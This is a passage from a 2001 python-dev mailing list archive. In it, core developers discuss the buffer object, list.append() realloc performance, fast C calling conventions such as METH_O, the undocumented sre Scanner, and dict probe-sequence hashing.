25, 2001 at 09:21:20AM -0400, Paul Barrett wrote: > "M.-A. Lemburg" wrote: > > > > > > BTW, wouldn't it suffice to add these methods to buffer objects ? > > > > Then you could write: buffer(ob).find('.'). > > > > > > You're totally missing the point with that suggestion. It does *not* > > suffice to add them to buffer objects. What about array objects? mmap > > objects? Random Joe Object who implements the buffer interface? 
> > > > That's the point: you can wrap all those into a buffer object > > and then use the buffer object methods to manipulate them. In > > that sense, buffer objects provide an adaptor to the underlying > > object which implements the needed methods. > > Sounds like you are trying to make the buffer object into something it > is not. The buffer object is intended to provide a Python-level object (with methods and behavior) for any other object which exports the buffer API (but not those particular methods/behavior). It was added for Python 1.5.2, but did not keep up with the methods added to the string object. Arguably, it is out of date rather than "[turning it into] something it is not." > Not that I have the foggiest idea what it is now, since it > hasn't much use and is badly broken. "badly" is overstating the problem. It caches a pointer when it shouldn't. This doesn't work well when using it with array objects or PIL's image objects. Most objects, it is fine. The buffer object is also very good for C/Python extensions and embedding code. It provides a Python-level view on a block of memory. Using a string object implies making a copy, and it removes the possibility for read/write access to that memory. And you state: "Not that I have the foggiest idea what it is now". If so, then wtf are you making statements about the buffer object's behavior? > I like your idea of sharing functions, I just don't think the buffer > object is the proper means. I think the buffer object should be > removed from Python and something better put in its place. (I'm not > talking about the buffer C/API, though this could also use an > overhaul, since it doesn't provide enough information to the receiving > method.) > > What I think we need is: > > 1) a malloc object which has a similar interface to the mmap object > with access protection, etc. This object would be the fundamental way > of getting memory. The string object would use it to allocate a chunk > of 'read-only' memory. 
Other objects would then know not to modify > the contents of the memory. If you wanted a reference or view of the > memory/buffer, you would get a reference to this object. You're talking about the buffer object that we have *today*. It can refer to another object (i.e. the memory exposed via the other object's buffer API), refer to memory, or it can allocate its own memory. The buffer object can be marked read-only, or read-write. > 2) objects supporting the buffer object should provide a view method > which returns a copy of themselves (and hence all their methods) and > can be used to get a pointer to a subset of its memory. In this way > the type of memory/buffer being accessed is known compared to the > current buffer object which only indicates the buffer is binary or > char data. In essence information about how the buffer should be used > is lost in the current buffer C/API. I'm not sure that I understand this paragraph. No... what needs to happen is to have the bug in PyBufferObject fixed. Then to refactor stringobject.c and stropmodule.c to move all of those byte-oriented processing functions into a new file such as Python/byteops.c (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c would be simple covers over the same functions. Those functions can then be used by PyBufferObject to implement the rest of the string methods on itself. This would leave us at MAL's suggested point: via the buffer object, we can perform all of the standard string methods/ops on any object that implements the buffer API. Cheers, -g -- Greg Stein, http://www.lyra.org/ From mal at lemburg.com Fri May 25 23:16:32 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 23:16:32 +0200 Subject: [Python-Dev] Time for the yearly list.append() panic References: Message-ID: <3B0ECBB0.6798F4AB@lemburg.com> Tim Peters wrote: > > Long-term we should teach PyMalloc about Python's realloc() abuses and craft a cooperative solution. 
That's what I think too. There's really not much point in trying to work around poor malloc() implementations when we've already got the cure built into Python... I just wish Vladimir would resurface again to complete his great work (AFAIK, pymalloc still has problems with threads). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Fri May 25 23:38:15 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Fri, 25 May 2001 23:38:15 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> Message-ID: <3B0ED0C7.F1A665EA@lemburg.com> "Martin v. Loewis" wrote: > > > Now this would be more flexible if you would implement a scheme > > which lets us put the parser string into the method list. The > > call mechanism could then easily figure out how to call the > > method and it would also be more easily extensible: > > > > {"append", (PyCFunction)listappend, METH_DIRECT, append_doc, "O"}, > > I'd like to hear other people's comment on this specific issue, so I > guess I should probably write a PEP outlining the options. > > My immediate reaction to your proposal is that it only complicates the > interface without any savings. We still can only support a limited > number of calling conventions. E.g. it is not possible to write > portable C code that does all the calling conventions for "l", "ll", > "lll", "llll", and so on - you have to cast the function pointer to > the right prototype, which must be done in source code. > > So with this interface, you may end up at run-time finding out that > you cannot support the signature. 
With the current patch, you'd have > to know to convert "OO" into METH_OO, which I think is not asked too > much - and it gives you a compile-time error if you use an unsupported > calling convention. True. It's unfortunate that C doesn't offer the reverse of varargs.h... > > A parser marker "OO" would then call a method like this: > > > > method(self, arg0, arg1) > > > > and so on. > > That is indeed the plan, but since you have to code the parameter > combinations in C code, you can only support so many of them. > > > allows implementing a generic scheme which > > then again relies on PyArg_ParseTuple() to do the argument > > parsing, e.g. "is#" could be implemented as: > > The point of the patch is to get rid of PyArg_ParseTuple in the > "common case". For functions with complex calling conventions, getting > rid of the PyArg_ParseTuple string parsing is not that important, > since they are expensive, anyway (not that "is#" couldn't be > supported, I'd call it METH_is_hash). > > > For optional arguments we'd need some convention which then > > lets the called function add the default value as needed. > > For the moment, I'd only support "|O", and perhaps "|z"; an omitted > argument would be represented as a NULL pointer. That means that "|i" > couldn't participate in the fast calling convention - unless we > translate that to > > void foo(PyObject*self, int i, bool ipresent); > > BTW, the most frequent function in my measurements that would make use > of this convention is "OO|i:replace", which scores at 4.5%. I was thinking of using pointer indirection for this: foo(PyObject *self, int *i) If i is given as argument, *i is set to the value, otherwise i is set to NULL. 
-- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Sat May 26 00:11:43 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 25 May 2001 18:11:43 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic In-Reply-To: <3B0ECBB0.6798F4AB@lemburg.com> Message-ID: [Tim] > Long-term we should teach PyMalloc about Python's realloc() > abuses and craft a cooperative solution. [MAL] > That's what I think too. There's really not much point in trying > to work around poor malloc() implementations when we've already > got the cure built into Python... The point *here* is that a simple localized patch could kill off a Frequently Irritating Complaint without further ado: on my personal cost/benefit scale, it's all I can *afford* to do now. PyMalloc likely won't solve it as-is x-platform, without new work to accommodate extreme realloc() abuse. > I just wish Vladimir would resurface again to complete his great > work I'd like him to come back even if he doesn't . > (AFAIK, pymalloc still has problems with threads). It has lock macros that haven't been #define'd to do anything yet. But part of the potential value of the Python core using its own allocator is to exploit the global interpreter lock to *not* lock in the allocator. Messy issues. Python should grow a cheaper platform-specific flavor of internal lock too. (Jeremy pointed out some code the other day that jumps through hoops to simulate a reentrant lock on top of a Python lock; an irony is that on Windows, the native lock *is* reentrant already, and Python jumps through hoops to make it act as if it weren't ) From mal at lemburg.com Sat May 26 00:07:00 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 00:07:00 +0200 Subject: [Python-Dev] strop vs. 
string References: <20010524013349.Y5402@lyra.org> <3B0CE00A.488C8D73@lemburg.com> <20010524060016.D5402@lyra.org> <3B0D20A0.3C881F89@lemburg.com> <3B0E5C50.6E365F69@STScI.Edu> <20010525132752.B5402@lyra.org> Message-ID: <3B0ED784.FC53D01@lemburg.com> Greg Stein wrote: > > No... what needs to happen is to have the bug in PyBufferObject fixed. Then > to refactor stringobject.c and stropmodule.c to move all of those > byte-oriented processing functions into a new file such as Python/byteops.c > (whatever; name isn't important). Ideally, stringobject.c and stropmodule.c > would be simple covers over the same functions. > > Those functions can then be used by PyBufferObject to implement the rest of > the string methods on itself. > > This would leave us at MAL's suggested point: via the buffer object, we can > perform all of the standard string methods/ops on any object that implements > the buffer API. I wonder how we could achieve this without copy&pasting all the needed methods from stringobject.c to bufferobject.c.... all the string methods use the string object layout directly rather than just dealing with a pointer and a length. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From m.favas at per.dem.csiro.au Sat May 26 04:34:20 2001 From: m.favas at per.dem.csiro.au (Mark Favas) Date: Sat, 26 May 2001 10:34:20 +0800 Subject: [Python-Dev] Time for the yearly list.append() panic Message-ID: <3B0F162C.AD16E452@per.dem.csiro.au> [Tim wants to know whether his patch to listobject.c slows anything down on anyone's "oddball box"...] While in no way admitting that mine is an oddball box , it being a Tru64 Unix alpha processor machine, I do see a slowdown after applying the patch (measured on the test suite and on pystone). However, it's only of the order of 0.5 to 1%. 
slightly-oddly y'rs - Mark -- Mark Favas - m.favas at per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From tim.one at home.com Sat May 26 06:05:40 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 26 May 2001 00:05:40 -0400 Subject: [Python-Dev] Time for the yearly list.append() panic In-Reply-To: <3B0F162C.AD16E452@per.dem.csiro.au> Message-ID: [Mark Favas] > [Tim wants to know whether his patch to listobject.c slows anything down > on anyone's "oddball box"...] > > While in no way admitting that mine is an oddball box , Heh -- of course not. I had more in mind obscure OSes like Linux . > it being a Tru64 Unix alpha processor machine, I do see a slowdown > after applying the patch (measured on the test suite and on pystone). > However, it's only of the order of 0.5 to 1%. Now that's very odd, since Alpha has about the slowest integer division on Earth, and every list append was doing an int div before the patch but not after. I'm afraid that timing the test suite before and after is a red herring, as several of the expensive tests have (pseudo)random components and can do an amount of work that varies depending on system time at the time random.py is first imported. pystone is even odder: the relevant code in listobject.c is never executed during pystone! I suspected that because pystone is an old synthetic Ada benchmark simulating a pile of integer systems programs, so pystone is unique among Python programs in not exercising any of Python's useful features -- a breakpoint in the debugger just now confirmed it (never did a list resize after compilation finished). So I'm pretty sure that after I check it in, you'll see a speedup instead . Get anywhere identifying why your other app is 20% slower (blast from the past)? From martin at loewis.home.cs.tu-berlin.de Sat May 26 07:28:32 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v.
Loewis) Date: Sat, 26 May 2001 07:28:32 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0ED0C7.F1A665EA@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> Message-ID: <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> > I was thinking of using pointer indirection for this: > > foo(PyObject *self, int *i) > > If i is given as argument, *i is set to the value, otherwise > i is set to NULL. That is a good idea; I'll try to update my patch to more calling conventions. Regards, Martin From tim.one at home.com Sat May 26 08:44:04 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 26 May 2001 02:44:04 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0ED784.FC53D01@lemburg.com> Message-ID: The buffer object has been neglected for years: is that because it's in prime shape, or because nobody cares about it enough to maintain it? "The bug" has been known for years without any action taken to address it; the docs give up in spots and nobody addresses that either (like "The current policy seems to state that these characters may be multi-byte characters" -- well, yes or no?); the builtin buffer() function isn't called anywhere in the std test suite; the file object still has an undocumented readinto() method that just confuses people who bump into it; and it's so obscure in daily life that it appears Guido didn't even think of it when adding iterators for the other sequence types. I expect that answers my question . Is someone (Greg? MAL?) going to champion it now? That would be cool. About combining strop and buffers and strings, don't forget unicodeobject.c: that's got oodles of basically duplicate code too. /F suggested dealing with the minor differences via maintaining one code file that gets compiled multiple times w/ appropriate #defines. 
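/F's suggestion, as relayed above, is to keep one copy of each routine and compile it several times under different #defines. A rough single-file analogue uses a macro that stamps out the same body once per character type. `DEFINE_COUNT`, `count_bytes` and `count_wide` are hypothetical names, and `wchar_t` merely stands in for whatever Unicode code-unit type the real code would use.

```c
#include <assert.h>
#include <stddef.h>
#include <wchar.h>

/* One shared body, instantiated once per character type. In the
   include-the-file-twice variant, this body would live in its own source
   file and CHAR_T / SUFFIX would be #defined before each #include. */
#define DEFINE_COUNT(CHAR_T, SUFFIX)                                      \
    static size_t count_##SUFFIX(const CHAR_T *s, size_t len, CHAR_T c)   \
    {                                                                     \
        size_t n = 0;                                                     \
        for (size_t i = 0; i < len; i++)                                  \
            if (s[i] == c)                                                \
                n++;                                                      \
        return n;                                                         \
    }

DEFINE_COUNT(char, bytes)    /* byte strings: count_bytes() */
DEFINE_COUNT(wchar_t, wide)  /* wide strings: count_wide()  */
```

As MAL points out in his reply, this removes duplicated source but not duplicated object code: each instantiation still compiles to a separate function.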
From tim.one at home.com Sat May 26 10:14:06 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 26 May 2001 04:14:06 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: I don't want to see us duplicate the guts of PyArg_ParseTuple() inside do_call_special(). METH_O is a cool idea, METH_l is marginal, and the new code is already slower for METH_O than it needs to be in order to support the *possibility* of METH_l too (stacks and loops and switch stmts and an extra layer of do_call_special function call "just in case"). Do METH_O, convert every "O" function to use it, declare victory, and enjoy the weekend . 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- size-ly y'rs - tim From m.favas at per.dem.csiro.au Sat May 26 10:30:29 2001 From: m.favas at per.dem.csiro.au (Mark Favas) Date: Sat, 26 May 2001 16:30:29 +0800 Subject: [Python-Dev] Time for the yearly list.append() panic References: Message-ID: <3B0F69A5.6F569573@per.dem.csiro.au> [Tim tells Mark that his observations reflect more Brownian motion (pseudo!) than reality...] > [Mark Favas] > > it being a Tru64 Unix alpha processor machine, I do see a slowdown > > after applying the patch (measured on the test suite and on pystone). > > However, it's only of the order of 0.5 to 1%. > > Now that's very odd, since Alpha has about the slowest integer divsion on > Earth, and every list append was doing an int div before the patch but not > after. > > I'm afraid that timing the test suite before and after is a red herring, as > several of the expensive tests have (pseudo)random components and can do an > amount of work that varies depending on system time at the time random.py is > first imported. > > pystone is even odder: the relevant code in listobject.c is never executed > during pystone! 
I suspected that because pystone is an old synthetic Ada > benchmark simulating a pile of integer systems programs, so pystone is > unique among Python programs in not exercising any of Python's useful > features -- a breakpoint in the debugger just now confirmed it (never > did a list resize after compilation finished). > > So I'm pretty sure that after I check it in, you'll see a speedup instead > . OK : this time, instead of making unwarranted assumptions about test suites and pystones , I wrote and ran a test that I _think_ should exercise the code (at least, it does lots of list.append()s), and, yes, the newly checked-in code's about 3-4% faster compared with the original version of, well, days ago. > > Get anywhere identifying why your other app is 20% slower (blast from the > past)? No, not yet. The profiling results at first eyeball seemed hard to match up, so I put it off for a rainy weekend. And Perth's drought has just broken... Will attempt to make sense of it. Interesting that Marc Andre seemed to get a somewhat similar slowdown between 1.52 and 2.0. -- Mark Favas - m.favas at per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From mal at lemburg.com Sat May 26 11:54:12 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 11:54:12 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> Message-ID: <3B0F7D44.1A12CE0F@lemburg.com> "Martin v. Loewis" wrote: > > > I was thinking of using pointer indirection for this: > > > > foo(PyObject *self, int *i) > > > > If i is given as argument, *i is set to the value, otherwise > > i is set to NULL. > > That is a good idea; I'll try to update my patch to more calling > conventions. 
This morning another idea popped up which could help us with handling generic calling schemes: How about making *all* parameters pointers ?! The calling mechanism would then just have to deal with a changing number of parameters and not with different types (this is how PyArg_ParseTuple() works too if I remember correctly). We could easily provide calling schemes for 1 - n arguments that way and the types of these arguments would be defined by the parser string just like before. Examples:

    foo(PyObject *self, PyObject *obj, int *i)
    bar(PyObject *self, int *i, int *j, char *txt, int *len)

To call these, the calling mechanism would have to cast these to:

    foo(void *, void *, void *)
    bar(void *, void *, void *, void *, void *)

Wouldn't this work ? -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From paulp at ActiveState.com Sat May 26 17:02:08 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Sat, 26 May 2001 08:02:08 -0700 Subject: [Python-Dev] Scanner Message-ID: <3B0FC570.17707787@ActiveState.com> What ever happened to the sre Scanner? It seemed like a good idea but it was not documented and it doesn't work for me. Is it just a case of nobody got around to the documentation or have we decided against it? Here's the code that doesn't work for me:

    from sre import Scanner

    scanner = Scanner([
        (r"[a-zA-Z_]\w*", None),
        (r"\d+\.\d*", None),
        (r"\d+", None),
        (r"=|\+|-|\*|/", None),
        (r"\s+", None),
    ])

    tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")

    Traceback (most recent call last):
      File "junk.py", line 11, in ?
        tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
      File "c:\program files\python21\lib\sre.py", line 254, in scan
        action = self.lexicon[m.lastindex][1]
    TypeError: sequence index must be integer

m.lastindex is None -- Take a recipe. Leave a recipe. Python Cookbook!
http://www.ActiveState.com/pythoncookbook From mal at lemburg.com Sat May 26 17:47:47 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sat, 26 May 2001 17:47:47 +0200 Subject: [Python-Dev] strop vs. string References: Message-ID: <3B0FD023.C4588919@lemburg.com> Tim Peters wrote: > > The buffer object has been neglected for years: is that because it's in > prime shape, or because nobody cares about it enough to maintain it? "The > bug" has been known for years without any action taken to address it; the > docs give up in spots and nobody addresses that either (like "The current > policy seems to state that these characters may be multi-byte characters" -- > well, yes or no?); the builtin buffer() function isn't called anywhere in > the std test suite; the file object still has an undocumented readinto() > method that just confuses people who bump into it; and it's so obscure in > daily life that it appears Guido didn't even think of it when adding > iterators for the other sequence types. > > I expect that answers my question . Is someone (Greg? MAL?) going to > champion it now? That would be cool. I believe that nobody really likes the buffer interface enough to let the world know about it, except maybe Greg ;-) Even the idea of replacing the usage of strings as data buffers with buffer object didn't get very far; common habits are simply hard to break. > About combining strop and buffers and strings, don't forget unicodeobject.c: > that's got oodles of basically duplicate code too. /F suggested dealing > with the minor differences via maintaining one code file that gets compiled > multiple times w/ appropriate #defines. Hmm, that only saves us a few kB in source, but certainly not in the object files. The better idea would be making the types subclass from a generic abstract string object -- I just don't know how this will be possible with Guido's type patches. We'll just have to wait, I guess. 
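Greg's refactoring and MAL's objection meet at one point: a routine shared by the string, strop and buffer code would have to work on a pointer and a length rather than on the string object layout. A minimal sketch of that shape follows. `bytes_view` and `byteops_find` are hypothetical names, not part of any existing byteops.c. A string or buffer object would be a thin cover that fills in the view and calls the shared routine.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical (pointer, length) view: everything a shared byte routine
   needs, independent of how a string or buffer object lays out its data. */
typedef struct {
    const char *ptr;
    size_t len;
} bytes_view;

/* Naive substring search over raw bytes. Returns the offset of the first
   match, or -1 if there is none. Because it compares with memcmp() and an
   explicit length, embedded NUL bytes are handled correctly. */
static long byteops_find(bytes_view hay, bytes_view needle)
{
    if (needle.len == 0)
        return 0;
    if (needle.len > hay.len)
        return -1;
    for (size_t i = 0; i + needle.len <= hay.len; i++)
        if (memcmp(hay.ptr + i, needle.ptr, needle.len) == 0)
            return (long)i;
    return -1;
}
```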
-- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Sat May 26 23:15:11 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 26 May 2001 17:15:11 -0400 Subject: [Python-Dev] Scanner In-Reply-To: <3B0FC570.17707787@ActiveState.com> Message-ID: [Paul Prescod] > What ever happened to the sre Scanner? It seemed like a good idea > but it was not documented I previously urged /F to document, and Python-Dev to accept, the .lastindex and .lastgroup match object extensions, but to date got no response. Whether to adopt the Scanner class too is fuzzier, since AFAICT almost nobody has figured out how to use it. > and it doesn't work for me. This isn't a code problem, it's a failure to reverse-engineer the undocumented API . > Is it just a case of nobody got around to the documentation or have > we decided against it? WRT Scanner, partly the former, nothing of the latter, mostly that there's been no discussion of the API at all. WRT lastindex and lastgroup, I think purely the former. > Here's the code that doesn't work for me: > > from sre import Scanner > > scanner = Scanner([ > (r"[a-zA-Z_]\w*", None), > (r"\d+\.\d*", None), > (r"\d+", None), > (r"=|\+|-|\*|/", None), > (r"\s+", None), > ]) 1. Every tokenization regexp must contain exactly one capturing group. The lack above is the source of your later TypeError. Unclear to me whether that was the intent, or just the way the code happens to work today. 2. When an action is None, the substring matched by the pattern will be thrown away. You need to supply non-None actions if you want anything to show up in the token list. > tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") > > Traceback (most recent call last): > File "junk.py", line 11, in ?
> tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar") > File "c:\program files\python21\lib\sre.py", line 254, in scan > action = self.lexicon[m.lastindex][1] > TypeError: sequence index must be integer > > m.lastindex is None

Here's a working rewrite:

    from sre import Scanner

    def retrieve(scanner, group):
        return group

    scanner = Scanner([
        (r"([a-zA-Z_]\w*)", retrieve),
        (r"(\d+\.\d*)", retrieve),
        (r"(\d+)", retrieve),
        (r"(=|\+|-|\*|/)", retrieve),
        (r"(\s+)", None),  # ignore whitespace
    ])

    tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
    print tokens, `tail`

That prints

    ['sum', '=', '3', '*', 'foo', '+', '312.50', '+', 'bar'] ''

In return for that, how about *you* supply a works-on-Windows rewrite of test_urllib2.py? You know more about that than anyone, and the test has been failing for weeks. From MarkH at ActiveState.com Sun May 27 04:39:43 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Sun, 27 May 2001 12:39:43 +1000 Subject: [Python-Dev] strop vs. string In-Reply-To: Message-ID: [Tim] > The buffer object has been neglected for years: is that because it's in > prime shape, or because nobody cares about it enough to maintain it? My take is a little different. I think people could be convinced to care about it, and indeed I do. However, it has one fatal flaw, and no one seems to know what to do about it. The problem is the one best demonstrated with the array module - if you get a pointer to the buffer interface for an array object, but the array then resizes itself, the buffer pointer dangles. There have been a few attempts over time to raise the buffer profile, but this design flaw leaves people scratching their head - it is hard to press for adoption of a feature that has a known crash hiding away. However, addressing this problem is difficult. Guido appears unconvinced that buffer objects and interfaces are that worthwhile.
It appears no one else knows how to proceed in the face of this ambivalence - that describes my take even if no one else's. The-buffer-is-dead,-long-live-the-buffer-ly, Mark. From tim.one at home.com Sun May 27 08:34:53 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 02:34:53 -0400 Subject: [Python-Dev] Next dict crusade Message-ID: I'm still trying to work off the backlog of ignored dict ideas. Way back here: http://mail.python.org/pipermail/python-dev/2000-December/011085.html Christian Tismer suggested using polynomial division instead of multiplication for generating the probe sequence, as a way to get all the bits of the hash code into play. The desirability of doing that is illustrated by, e.g., this program:

    def f(keys):
        from time import clock
        d = {}
        s = clock()
        for k in keys:
            d[k] = k
        f = clock()
        print "build time %.3f" % (f-s)
        s = clock()
        for k in keys:
            assert d.has_key(k)
        f = clock()
        print "search time %.3f" % (f-s)

    # Excellent performance.
    keys = range(20000)
    for i in range(5):
        f(keys)

    # Terrible performance; > 500x slower.
    keys = [i << 16 for i in range(20000)]
    for i in range(5):
        f(keys)

Christian had a very clever (cheap and effective) solution:

    Old algorithm (multiplication):
        shift the index left by 1
        if index > mask:
            xor the index with the generator polynomial

    New algorithm (division):
        if low bit of index set:
            xor the index with the generator polynomial
        shift the index right by 1

where "index" should really read "increment", and unlike today we do not mask off any of the bits of the initial increment (and that's what lets *all* the bits of the hash code come into play; there's no point to doing this otherwise). I've since discovered that it's got a fatal rare flaw: the new algorithm can generate a 0 increment, while the old algorithm cannot. Example: poly is 131 and hash is 145.
Because we don't mask off any bits in computing the initial increment, the initial increment is computed as incr = hash ^ (hash >> 3) == 145 ^ (145 >> 3) == 145 ^ 18 == 131 == poly So if we don't hit on the first probe, the new if low bit of index set: xor the index with the generator polynomial shift the index right by 1 business sets incr to 0, and the result is an infinite loop (0 is a fixed point). I hate to add another branch to this. As is, the existing branch in both the old and new ways is of the worst possible kind: it's taken half the time, with a pseudo-random distribution. So there's not a branch-prediction gimmick on earth it won't fool. Note that there's no reasonable way to identify "bad values" for incr before the loop starts, either -- there's really no way to tell whether incr mod poly is 0 without a loop to do division steps until incr < poly (if incr < poly and incr != 0, incr can never become 0, so there's no more need to test after reaching that point). Such a "pre loop" would cost more than the existing loop in most cases, as we usually get out of the existing loop today on its first iteration. But in that case, what am I worried about ? time-for-a-checkin-ly y'rs - tim From martin at loewis.home.cs.tu-berlin.de Sun May 27 11:01:14 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. 
Loewis) Date: Sun, 27 May 2001 11:01:14 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0F7D44.1A12CE0F@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> Message-ID: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> > To call these, the calling mechanism would have to cast these > to: > > foo(void *, void *, void *) > bar(void *, void *, void *, void *, void *) > > Wouldn't this work ? I think it would work, but I doubt it would save much compared to the existing approach. The main point of this patch is to improve efficiency, and (according to Jeremy's analysis), most of the time for calling a function is spent in PyArg_ParseTuple. So if we replace it with another interface that also relies on parsing a string, I doubt we'll improve efficiency. IOW, I won't implement that approach. If you do, I'd be curious to hear the results, of course. Regards, Martin P.S. There would still be cases where PyArg_ParseTuple is needed, e.g. for "O!". From mal at lemburg.com Sun May 27 12:26:27 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 27 May 2001 12:26:27 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> Message-ID: <3B10D653.4D81E280@lemburg.com> "Martin v. Loewis" wrote: > > > To call these, the calling mechanism would have to cast these > > to: > > > > foo(void *, void *, void *) > > bar(void *, void *, void *, void *, void *) > > > > Wouldn't this work ?
> > I think it would work, but I doubt it would save much compared to the > existing approach. The main point of this patch is to improve > efficiency, and (according to Jeremy's analysis), most of the time for > calling a function is spend in PyArg_ParseTuple. So if we replace it > with another interface that also relies on parsing a string, I doubt > we'll improve efficiency. That's the point: we are not replacing PyArg_ParseTuple() with another parsing mechanism, we are only using PyArg_ParseTuple() as fallback solution for parser strings for which we don't provide a special case implementation. The idea is to simply do a strcmp() (*) for a few common combinations (like e.g. "O" and "OO") and then provide the same special case handling like you do with e.g. METH_O. The result would be almost the same w/r to performance and code reduction as with your approach. The only addition would be using strcmp() instead of a switch statement. The advantage of this approach is that while you can still provide special case handling of common parser strings, you can also provide generic APIs for most other parser strings by reverting to PyArg_ParseTuple() for these. > IOW, I won't implement that approach. If you do, I'd be curious to > hear the results, of course. I'll see what I can do... > P.S. There would be still cases where PyArg_ParseTuple is needed, > e.g. for "O!". True... can't win 'em all ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Sun May 27 12:30:48 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 27 May 2001 12:30:48 +0200 Subject: [Python-Dev] strop vs. 
string References: Message-ID: <3B10D758.3741AC2F@lemburg.com> Mark Hammond wrote: > > [Tim] > > The buffer object has been neglected for years: is that because it's in > > prime shape, or because nobody cares about it enough to maintain it? > > My take is a little different. I think people could be convinced to care > about it, and indeed I do. However, it has one fatal flaw, and no one seems > to know what to do about it. > > The problem is the one best demonstrated with the array module - if you get > a pointer to the buffer interface for an array object, but the array then > resizes itself, the buffer pointer dangles. I guess there are three ways to "solve" this: a) mutable types don't implement the getreadbuf interface b) the getreadbuf interface is complemented with a callback interface, so the the buffer object can be notified of the change c) calling getreadbuf on a mutable object causes this object to become immutable -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jeremy at digicool.com Sun May 27 20:51:26 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Sun, 27 May 2001 14:51:26 -0400 (EDT) Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> Message-ID: <15121.19630.329909.482775@slothrop.digicool.com> >>>>> "MvL" == Martin v Loewis writes: MvL> to the existing approach. 
